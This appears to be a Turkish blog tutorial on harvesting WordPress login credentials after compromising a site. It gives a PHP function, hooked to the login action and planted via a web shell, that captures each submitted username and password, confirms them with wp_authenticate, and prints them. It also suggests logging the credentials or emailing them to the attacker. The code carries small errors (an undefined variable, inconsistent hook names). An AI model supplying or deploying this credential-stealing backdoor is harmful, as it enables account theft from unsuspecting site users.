WordPress Kullanıcı Bilgilerini Doğrulama Ve Loglama

Merhaba Yeni yazıma hoşgeldiniz. Bu yazımda wordpress’in bize vermiş olduğu fonksiyonu kullanarak doğru kullanıcı bilgilerini nasıl alabileceğimizi anlatacağım mantık basit saldırı senaryomu oluşturuyorum ve başlayalım.

İlk olarak hedef bir wordpress sitesi düşünüyorum ve bu siteyi hacklemem lazım. Saldırı yapabileceğim kısımları temel bir ön keşif ile öğreniyorum ve sistemimi hackliyorum. ( Normal’de bu kadar basit olmaz bu konumda detaylara girmeyeceğim ).

Şimdi kullanıcının bilgilerini alabilmemiz için wp-login’e bir aksiyon eklememiz lazım nasıl ekleyeceğimizi anlatalım.

add_action(‘wp-login’,’Fonsiyon İsminiz’)

bu kadarı’da basit şimdi asıl olayımıza gelelim wordpress’e girilen bilgileri nasıl çekeceğim ? hemen onada bakalım.

function umutpw()
{
if($_POST)
{
$log = $_POST['log'];
$pas = $_POST['pwd'];
if(!empty($log) and !empty($pas))
{
$umut = wp_authenticate($log,$pas);
if(!is_wp_error($umut))
{
echo 'Kullanıcı Bilgileri Doğru | Kullanıcı Adı : ' . $log . ' Şifre : ' . $pwd;
}
}
}
}

Fonksiyonumuzu yazdık bu kodlarımızı wordpress’e dahil etmemiz lazım bunun içinde sayfamıza Web shell yükleyebiliriz. Akıllı arkadaşlar shell Yükleyecek kadar sisteme girdiysem bu bilgiyi ne yapacağım diyebiliriz biz burda sistemi değil kullanıcıyı hackliyoruz kullanıcı hakkında bilgi topluyoruz !

yükledikten sonra kodumuzu wp-login’e ekleyelim.

add_action(‘wp_login’, ‘umutpw’);

Artık girilen bilgileri takır takır ekrana yazdırılır isterseniz farklı bir yere yazdırırsınız isterseniz de mail olarak kendinize atarsınız kolay gelsin.